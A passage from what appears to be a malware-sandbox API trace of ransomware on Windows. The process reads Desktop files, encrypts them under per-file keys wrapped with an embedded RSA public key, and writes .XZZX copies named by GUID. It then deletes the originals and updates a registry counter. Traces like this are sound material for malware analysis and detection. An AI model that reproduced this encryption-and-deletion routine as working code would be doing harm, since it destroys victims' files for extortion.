dwFlags=0x0) returned 0x75ce0000 [0167.827] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.827] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zexl18m.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zexl18m.mp3")) returned 1 [0167.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zexl18m.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zexl18m.mp3")) returned 0 Thread: id = 570 os_tid = 0x920 [0167.878] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.878] lstrcpyW (in: lpString1=0x29af460, lpString2="ZZFMbf.odt" | out: lpString1="ZZFMbf.odt") returned="ZZFMbf.odt" [0167.878] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.878] SetErrorMode (uMode=0x1) returned 0x1 [0167.878] lstrcpyW (in: lpString1=0x29af860, lpString2="ZZFMbf.odt" | out: lpString1="ZZFMbf.odt") returned="ZZFMbf.odt" [0167.878] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x24563e03, Data2=0x9086, Data3=0x481c, Data4=([0]=0xb4, [1]=0x9, [2]=0xe3, [3]=0x15, [4]=0x9b, [5]=0xfe, [6]=0x38, [7]=0x9f))) returned 0x0 [0167.878] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZZFMbf.odt") returned 52 [0167.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.878] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8806259228B57EA824563E032B5062F0.XZZX") returned 79 [0167.878] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="XZZX") returned 0x0 [0167.878] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZZFMbf.odt", dwFileAttributes=0x20) returned 1 [0167.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZZFMbf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzfmbf.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a0 [0167.879] ReadFile (in: hFile=0x9a0, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x13d89, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x13d89, lpOverlapped=0x0) returned 1 [0167.880] CloseHandle (hObject=0x9a0) returned 1 [0167.880] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0167.880] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0167.881] SetErrorMode (uMode=0x1) returned 0x1 [0167.881] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.881] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a4bf0) returned 1 [0167.884] CryptGenKey (in: hProv=0x43a4bf0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0168.179] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.179] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.179] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.179] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0168.179] CryptDestroyKey (hKey=0x43728b8) returned 1 [0168.179] CryptReleaseContext (hProv=0x43a4bf0, dwFlags=0x0) returned 1 [0168.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8806259228B57EA824563E032B5062F0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8806259228b57ea824563e032b5062f0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a0 [0168.180] WriteFile (in: hFile=0x9a0, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x13d89, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x13d89, lpOverlapped=0x0) returned 1 [0168.181] SetFilePointer (in: hFile=0x9a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13d89 [0168.181] WriteFile (in: hFile=0x9a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.181] SetFilePointer (in: hFile=0x9a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13d8e [0168.181] WriteFile (in: hFile=0x9a0, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x14, lpOverlapped=0x0) returned 1 [0168.181] SetFilePointer (in: hFile=0x9a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13da2 [0168.181] WriteFile (in: hFile=0x9a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.181] SetFilePointer (in: hFile=0x9a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13da7 [0168.181] SetErrorMode (uMode=0x1) returned 0x1 [0168.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0168.181] OutputDebugStringW (lpOutputString="end") [0168.181] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.181] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0168.181] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a4bf0) returned 1 [0168.182] CryptImportPublicKeyInfo (in: hCryptProv=0x43a4bf0, dwCertEncodingType=0x1, pInfo=0x437f568*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f598*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f5a0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372cb8) returned 1 [0168.182] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.182] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0168.182] CryptEncrypt (in: hKey=0x4372cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0168.182] CryptEncrypt (in: hKey=0x4372cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a4c78*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a4c78*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0168.182] WriteFile (in: hFile=0x9a0, lpBuffer=0x43a4c78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a4c78*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0168.182] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0168.182] WriteFile (in: hFile=0x9a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.183] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0168.183] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0168.183] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9a8) returned 0x0 [0168.183] RegQueryValueExW (in: hKey=0x9a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf5, lpcbData=0x29adfdc*=0x4) returned 0x0 [0168.183] RegCloseKey (hKey=0x9a8) returned 0x0 [0168.183] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9a8) returned 0x0 [0168.183] RegSetValueExW (in: hKey=0x9a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf6, cbData=0x4 | out: lpData=0x29adfec*=0xf6) returned 0x0 [0168.183] RegCloseKey (hKey=0x9a8) returned 0x0 [0168.183] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.183] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.184] CloseHandle (hObject=0x9a0) returned 1 [0168.184] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0168.184] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0168.184] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZZFMbf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzfmbf.odt")) returned 1 [0168.186] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZZFMbf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzfmbf.odt")) returned 0 Thread: id = 571 os_tid = 0x924 [0168.394] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.394] lstrcpyW (in: lpString1=0x29af460, lpString2="_av9Cb6IPXGAa5C.mp4" | out: lpString1="_av9Cb6IPXGAa5C.mp4") returned="_av9Cb6IPXGAa5C.mp4" [0168.394] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0168.394] SetErrorMode (uMode=0x1) returned 0x1 [0168.394] lstrcpyW (in: lpString1=0x29af860, lpString2="_av9Cb6IPXGAa5C.mp4" | out: lpString1="_av9Cb6IPXGAa5C.mp4") returned="_av9Cb6IPXGAa5C.mp4" [0168.395] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x2200cb9, Data2=0x292f, Data3=0x482f, Data4=([0]=0xaf, [1]=0xc9, [2]=0x79, [3]=0xd2, [4]=0x6a, [5]=0x71, [6]=0x64, [7]=0xdb))) returned 0x0 [0168.395] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_av9Cb6IPXGAa5C.mp4") returned 61 [0168.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0168.395] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\85EBF6F70B9CC7A102200CB90E37ABE9.XZZX") returned 79 [0168.395] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="XZZX") returned 0x0 [0168.395] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_av9Cb6IPXGAa5C.mp4", dwFileAttributes=0x20) returned 1 [0168.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_av9Cb6IPXGAa5C.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_av9cb6ipxgaa5c.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a4 [0168.395] ReadFile (in: hFile=0x9a4, lpBuffer=0x43ac728, nNumberOfBytesToRead=0x701f, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesRead=0x29ae418*=0x701f, lpOverlapped=0x0) returned 1 [0168.395] CloseHandle (hObject=0x9a4) returned 1 [0168.395] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0168.396] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0168.396] SetErrorMode (uMode=0x1) returned 0x1 [0168.396] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0168.396] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a4d00) returned 1 [0168.398] CryptGenKey (in: hProv=0x43a4d00, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0168.490] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.490] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.490] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.490] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0168.490] CryptDestroyKey (hKey=0x43728b8) returned 1 [0168.490] CryptReleaseContext (hProv=0x43a4d00, dwFlags=0x0) returned 1 [0168.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\85EBF6F70B9CC7A102200CB90E37ABE9.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\85ebf6f70b9cc7a102200cb90e37abe9.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a4 [0168.490] WriteFile (in: hFile=0x9a4, lpBuffer=0x43ac728*, nNumberOfBytesToWrite=0x701f, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesWritten=0x29ae438*=0x701f, lpOverlapped=0x0) returned 1 [0168.491] SetFilePointer (in: hFile=0x9a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x701f [0168.491] WriteFile (in: hFile=0x9a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.491] SetFilePointer (in: hFile=0x9a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7024 [0168.491] WriteFile (in: hFile=0x9a4, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x26, lpOverlapped=0x0) returned 1 [0168.492] SetFilePointer (in: hFile=0x9a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x704a [0168.492] WriteFile (in: hFile=0x9a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.492] SetFilePointer (in: hFile=0x9a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x704f [0168.492] SetErrorMode (uMode=0x1) returned 0x1 [0168.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0168.492] OutputDebugStringW (lpOutputString="end") [0168.492] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.492] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0168.492] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a4d00) returned 1 [0168.493] CryptImportPublicKeyInfo (in: hCryptProv=0x43a4d00, dwCertEncodingType=0x1, pInfo=0x437f638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f670*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372cf8) returned 1 [0168.493] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.493] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0168.493] CryptEncrypt (in: hKey=0x4372cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0168.493] CryptEncrypt (in: hKey=0x4372cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a4d88*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a4d88*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0168.493] WriteFile (in: hFile=0x9a4, lpBuffer=0x43a4d88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a4d88*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0168.493] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0168.493] WriteFile (in: hFile=0x9a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.493] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0168.493] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0168.493] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9ac) returned 0x0 [0168.493] RegQueryValueExW (in: hKey=0x9ac, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf6, lpcbData=0x29adfdc*=0x4) returned 0x0 [0168.493] RegCloseKey (hKey=0x9ac) returned 0x0 [0168.493] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9ac) returned 0x0 [0168.494] RegSetValueExW (in: hKey=0x9ac, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf7, cbData=0x4 | out: lpData=0x29adfec*=0xf7) returned 0x0 [0168.494] RegCloseKey (hKey=0x9ac) returned 0x0 [0168.494] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.494] 